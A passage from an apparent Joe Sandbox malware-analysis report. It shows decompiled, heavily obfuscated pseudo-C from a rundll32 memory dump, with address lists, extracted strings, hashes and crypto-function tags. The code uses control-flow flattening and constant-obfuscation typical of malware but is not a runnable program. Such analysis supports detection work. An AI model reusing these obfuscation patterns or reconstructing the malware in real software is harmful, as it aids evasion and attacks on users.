							if(_t327 > 0) {
								break;
							}
							if(_t327 == 0) {
								_t271 = 0x1679d154;
								continue;
							} else {
								if(_t271 == 0x829cfc0) {
									_t311 = _v8;
									if(_t311 != 0) {
										do {
											_t320 =  *((intOrPtr*)(_t311 + 0x220));
											E0024F536(_v56, _v12, _v60, _t311);
											_t311 = _t320;
										} while (_t320 != 0);
									}
								} else {
									if(_t271 == _t251) {
										_t312 = _v8;
										_t268 = 0;
										if(_t312 != 0) {
											do {
												E00246636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
												_t256 = E00250ADC(_t312 + 0xc, _v40, _v76);
												_t325 =  &(_t325[4]);
												_t269 = _t268 + _t256;
												_t257 = 0x2c;
												 *((short*)(_t323 + _t269 * 2)) = _t257;
												_t268 = _t269 + 1;
												_t312 =  *((intOrPtr*)(_t312 + 0x220));
											} while (_t312 != 0);
											_t251 = 0x10ef006b;
										}
										_t319 = _v4;
										_t271 = 0x33a3af6e;
										_t310 = _a8;
										continue;
									} else {
										if(_t271 == 0x1679d154) {
											E00255A61( &_v8, E00258D1C, _v44, _v48, _v88);
											_t325 =  &(_t325[4]);
											_t271 = 0x20b4c829;
											while(1) {
												L1:
												_t251 = 0x10ef006b;
												goto L2;
											}
										} else {
											if(_t271 != 0x19514a0a) {
												goto L24;
											} else {
												_push(_t271);
												_push(_t271);
												_t323 = E00248736(_t319 + _t319);
												_t251 = 0x10ef006b;
												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
												continue;
											}
										}
									}
								}
							}
							L28:
							return 0 |  *_a8 != 0x00000000;
						}
						if(_t271 == 0x20b4c829) {
							_t309 = _v8;
							_t319 = 0;
							_v4 = 0;
							if(_t309 != 0) {
								do {
									_t258 = E00250ADC(_t309 + 0xc, _v16, _v20);
									_t309 =  *(_t309 + 0x220);
									_t319 = _t319 + 1 + _t258;
								} while (_t309 != 0);
								_v4 = _t319;
								_t251 = 0x10ef006b;
							}
							_t310 = _a8;
							_t271 = 0x19514a0a;
							goto L24;
						} else {
							if(_t271 == 0x2b3a1c97) {
								E0024F536(_v64, _v24, _v28, _t323);
								_t271 = 0x829cfc0;
								goto L1;
							} else {
								if(_t271 != 0x33a3af6e) {
									goto L24;
								} else {
									_t260 = _t310 + 4;
									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
									_t262 = E00255D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
									_t325 =  &(_t325[6]);
									 *_t310 = _t262;
									_t271 = 0x2b3a1c97;
									while(1) {
										L1:
										_t251 = 0x10ef006b;
										goto L2;
									}
								}
							}
						}
						goto L28;
						L24:
					} while (_t271 != 0x202e1177);
					goto L28;
				}
			}

0x0025a0bd
0x0025a0be
0x0025a0c5
0x0025a0c6
0x0025a0c7
0x0025a0cc
0x0025a0d4
0x0025a0d7
0x0025a0e1
0x0025a0e6
0x0025a0eb
0x0025a0f3
0x0025a101
0x0025a106
0x0025a10c
0x0025a114
0x0025a119
0x0025a121
0x0025a129
0x0025a131
0x0025a139
0x0025a141
0x0025a149
0x0025a151
0x0025a15e
0x0025a161
0x0025a165
0x0025a16d
0x0025a175
0x0025a17d
0x0025a182
0x0025a18a
0x0025a192
0x0025a19a
0x0025a1a2
0x0025a1aa
0x0025a1b2
0x0025a1ba
0x0025a1c2
0x0025a1c7
0x0025a1d4
0x0025a1d8
0x0025a1e0
0x0025a1e8
0x0025a1f2
0x0025a1f5
0x0025a201
0x0025a205
0x0025a20d
0x0025a215
0x0025a21d
0x0025a225
0x0025a22d
0x0025a232
0x0025a23a
0x0025a242
0x0025a24a
0x0025a256
0x0025a259
0x0025a265
0x0025a268
0x0025a26f
0x0025a273
0x0025a27b
0x0025a283
0x0025a28b
0x0025a293
0x0025a29b
0x0025a2a3
0x0025a2a8
0x0025a2b0
0x0025a2b8
0x0025a2c0
0x0025a2c8
0x0025a2d0
0x0025a2d8
0x0025a2dd
0x0025a2e5
0x0025a2ea
0x0025a2f2
0x0025a2fa
0x0025a2ff
0x0025a307
0x0025a30f
0x0025a314
0x0025a319
0x0025a321
0x0025a329
0x0025a331
0x0025a339
0x0025a341
0x0025a349
0x0025a351
0x0025a359
0x0025a361
0x0025a369
0x0025a371
0x0025a37c
0x0025a384
0x0025a38c
0x0025a394
0x0025a39c
0x0025a3a4
0x0025a3a9
0x0025a3b1
0x0025a3b9
0x0025a3c1
0x0025a3c9
0x0025a3d1
0x0025a3d1
0x0025a3d1
0x0025a3d6
0x0025a3d6
0x0025a3d6
0x0025a3d6
0x0025a3dc
0x00000000
0x00000000
0x0025a3e2
0x0025a4cb
0x00000000
0x0025a3e8
0x0025a3ee
0x0025a592
0x0025a598
0x0025a59a
0x0025a59a
0x0025a5ad
0x0025a5b2
0x0025a5b6
0x0025a59a
0x0025a3f4
0x0025a3f6
0x0025a462
0x0025a466
0x0025a46a
0x0025a46c
0x0025a485
0x0025a494
0x0025a499
0x0025a49c
0x0025a4a0
0x0025a4a1
0x0025a4a6
0x0025a4a7
0x0025a4ad
0x0025a4b1
0x0025a4b1
0x0025a4b6
0x0025a4ba
0x0025a4bf
0x00000000
0x0025a3f8
0x0025a3fe
0x0025a450
0x0025a455
0x0025a458
0x0025a3d1
0x0025a3d1
0x0025a3d1
0x00000000
0x0025a3d1
0x0025a400
0x0025a406
0x00000000
0x0025a40c
0x0025a418
0x0025a419
0x0025a423
0x0025a425
0x0025a432
0x00000000
0x0025a432
0x0025a406
0x0025a3fe
0x0025a3f6
0x0025a3ee
0x0025a5ba
0x0025a5cf
0x0025a5cf
0x0025a4db
0x0025a543
0x0025a547
0x0025a549
0x0025a54f
0x0025a551
0x0025a55c
0x0025a561
0x0025a568
0x0025a56b
0x0025a56f
0x0025a573
0x0025a573
0x0025a578
0x0025a57f
0x00000000
0x0025a4dd
0x0025a4e3
0x0025a532
0x0025a539
0x00000000
0x0025a4e5
0x0025a4eb
0x00000000
0x0025a4f1
0x0025a4f1
0x0025a4f4
0x0025a511
0x0025a516
0x0025a519
0x0025a51b
0x0025a3d1
0x0025a3d1
0x0025a3d1
0x00000000
0x0025a3d1
0x0025a3d1
0x0025a4eb
0x0025a4e3
0x00000000
0x0025a584
0x0025a584
0x00000000
0x0025a590

Strings

V=, xrefs: 0025A394
c~, xrefs: 0025A273
_, xrefs: 0025A151
L, xrefs: 0025A331
2a, xrefs: 0025A3A9
/, xrefs: 0025A28B
g]ht, xrefs: 0025A2C8

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2a$L$c~$g]ht$/$V=$_
API String ID: 0-445983283
Opcode ID: f99550f65041150c070c87fc6ff9b04668c9cf282756a6e3190eabfe81e7539f
Instruction ID: d0205c39b58805d98b53327a12969c8457fda054a749410ad01e4452f9638825
Opcode Fuzzy Hash: f99550f65041150c070c87fc6ff9b04668c9cf282756a6e3190eabfe81e7539f
Instruction Fuzzy Hash: CFD174725187819FD368CF61C48A91BBBE1FBC4758F604A0CF996862A0D7B49919CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00257F1F, Relevance: 9.0, Strings: 7, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00257F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00257F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E0024D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00257F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00257F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E0024D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00257F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E0024D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00257F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}

0x00257f1f
0x00257f22
0x00257f2c
0x00257f34
0x00257f40
0x00257f42
0x00257f44
0x00257f48
0x00257f4d
0x00257f55
0x00257f60
0x00257f65
0x00257f6b
0x00257f73
0x00257f7b
0x00257f83
0x00257f8b
0x00257f93
0x00257f9b
0x00257fa0
0x00257fa8
0x00257fb0
0x00257fb8
0x00257fbd
0x00257fc7
0x00257fca
0x00257fce
0x00257fd6
0x00257fe6
0x00257fea
0x00257ff2
0x00257ffa
0x00258002
0x0025800a
0x00258012
0x0025801a
0x00258022
0x0025802a
0x00258032
0x0025803a
0x00258042
0x0025804a
0x00258052
0x0025805a
0x00258062
0x00258067
0x0025806f
0x00258077
0x0025807f
0x00258084
0x0025808c
0x00258094
0x002580a0
0x002580a3
0x002580a7
0x002580af
0x002580b7
0x002580bf
0x002580c9
0x002580cd
0x002580d5
0x002580dd
0x002580e5
0x002580ed
0x002580f5
0x0025810b
0x0025810f
0x00258114
0x0025811c
0x00258124
0x00258134
0x00258138
0x00258144
0x00258149
0x0025814f
0x00258157
0x00258164
0x00258165
0x00258169
0x00258171
0x00258179
0x00258181
0x00258186
0x0025818e
0x00258196
0x0025819b
0x002581a3
0x002581ab
0x002581b3
0x002581bb
0x002581bf
0x002581c7
0x002581d4
0x002581dd
0x002581e1
0x002581e9
0x002581f6
0x002581fa
0x00258202
0x0025820a
0x00258218
0x0025821c
0x0025821c
0x00258224
0x00258224
0x00258224
0x00258224
0x00258226
0x00000000
0x00000000
0x0025822c
0x002582c7
0x002582c8
0x002582cd
0x002582d0
0x002582d5
0x00000000
0x00258232
0x00258238
0x002582b5
0x00000000
0x0025823a
0x00258240
0x0025829d
0x002582a1
0x002582a6
0x002582a9
0x002582ae
0x00000000
0x00258242
0x00258248
0x0025827b
0x0025827c
0x00258281
0x00258284
0x00258289
0x00000000
0x0025824a
0x00258250
0x00000000
0x00258256
0x0025825e
0x00258267
0x00258267
0x00258250
0x00258248
0x00258240
0x00258238
0x00258269
0x00258272
0x00258272
0x002582e2
0x00258368
0x0025836c
0x00258371
0x00258374
0x00258379
0x00000000
0x002582e4
0x002582ea
0x00258346
0x00258347
0x0025834c
0x0025834f
0x00258351
0x00000000
0x002582ec
0x002582f2
0x00258326
0x0025832a
0x0025832f
0x00258332
0x00258337
0x00000000
0x002582f4
0x002582fa
0x00000000
0x002582fc
0x00258304
0x00258305
0x0025830a
0x0025830d
0x00258312
0x00000000
0x00258312
0x002582fa
0x002582f2
0x002582ea
0x00000000
0x0025837b
0x0025837b
0x00000000

Strings

XW, xrefs: 0025808C
,H, xrefs: 002581AB
bh, xrefs: 0025806F
S,, xrefs: 00258157
9c%', xrefs: 002582EC
~, xrefs: 0025803A
9c%', xrefs: 002582B5

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,H$9c%'$9c%'$S,$XW$bh$~
API String ID: 0-4263808623
Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction ID: d4bd8fcfe51617f1bc2d6f153f00243310daa2929fe4ced41685a7e444f9d3e0
Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction Fuzzy Hash: B7B154B29183819FD358CF25D98940BFBE1BBC4744F00891DF986A6260DBB5DA09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 002469A0, Relevance: 9.0, Strings: 7, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002469A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00248736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E0024F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x25ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x25ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E0025422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00256DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00241132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00259586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E002476DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}

0x002469a0
0x002469a3
0x002469af
0x002469b1
0x002469b3
0x002469b9
0x002469c1
0x002469c3
0x002469c8
0x002469cd
0x002469d5
0x002469dd
0x002469e5
0x002469ed
0x002469f5
0x002469fd
0x00246a0b
0x00246a10
0x00246a16
0x00246a1e
0x00246a26
0x00246a32
0x00246a37
0x00246a3d
0x00246a42
0x00246a4a
0x00246a52
0x00246a5a
0x00246a5f
0x00246a67
0x00246a6f
0x00246a77
0x00246a7f
0x00246a87
0x00246a8c
0x00246a94
0x00246a9c
0x00246aa4
0x00246aac
0x00246ab4
0x00246abc
0x00246ac4
0x00246acc
0x00246ad4
0x00246adc
0x00246ae4
0x00246aec
0x00246af1
0x00246af9
0x00246b01
0x00246b09
0x00246b11
0x00246b1a
0x00246b1d
0x00246b21
0x00246b29
0x00246b31
0x00246b39
0x00246b41
0x00246b49
0x00246b51
0x00246b59
0x00246b61
0x00246b69
0x00246b71
0x00246b79
0x00246b81
0x00246b8b
0x00246b90
0x00246b95
0x00246b9d
0x00246ba5
0x00246bad
0x00246bb5
0x00246bbd
0x00246bc5
0x00246bd2
0x00246bd6
0x00246bde
0x00246be6
0x00246bee
0x00246bf6
0x00246bfe
0x00246c06
0x00246c0e
0x00246c16
0x00246c1e
0x00246c1e
0x00246c1e
0x00246c23
0x00000000
0x00246c28
0x00246c28
0x00246c2e
0x00246d35
0x00246d36
0x00246d39
0x00246d3f
0x00246d43
0x00246d45
0x00246d4e
0x00246d53
0x00246d58
0x00246d5d
0x00000000
0x00246d5d
0x00246d47
0x00246d22
0x00246d22
0x00246cca
0x00246cca
0x00246ccf
0x00246ccf
0x00000000
0x00246ccf
0x00246c3a
0x00000000
0x00246d96
0x00246c42
0x00246d70
0x00246d73
0x00246d78
0x00246d7b
0x00000000
0x00246d7b
0x00246c4e
0x00246d17
0x00246d1d
0x00000000
0x00246d1d
0x00246c5a
0x00246cd9
0x00246ceb
0x00246cf0
0x00246cf3
0x00246cf6
0x00246cfd
0x00246d02
0x00246d07
0x00000000
0x00246d07
0x00246c5e
0x00246c93
0x00246cb0
0x00246cb5
0x00246cb8
0x00246cbb
0x00246cc2
0x00246cc7
0x00000000
0x00246cc7
0x00246c62
0x00000000
0x00000000
0x00246c77
0x00246c7c
0x00246c7f
0x00246c89
0x00246c8e
0x00000000
0x00246d62
0x00246d62
0x00246d62
0x00000000
0x00246c28
0x00246c28

Strings

.V, xrefs: 00246AD4
"=, xrefs: 00246B79
?j, xrefs: 00246B39
GX, xrefs: 00246A67
y7X, xrefs: 00246B71
k<, xrefs: 00246A1E
'&/U, xrefs: 00246AB4

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "=$'&/U$.V$?j$GX$y7X$k<
API String ID: 0-2482092835
Opcode ID: a7e5d1a2f3d287a44995c79708e55e1112216707bb59d5886862548a72b63c66
Instruction ID: 5f079f9dc98511229a2982a19e5f9ccc4842dd1e519dd6019df158affef14e39
Opcode Fuzzy Hash: a7e5d1a2f3d287a44995c79708e55e1112216707bb59d5886862548a72b63c66
Instruction Fuzzy Hash: E5A183B2928341AFD358CF25C58A40BFBE1FBD5714F508A1DF48AA6260D7B5C919CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00241280, Relevance: 7.7, Strings: 6, Instructions: 157
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00241280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
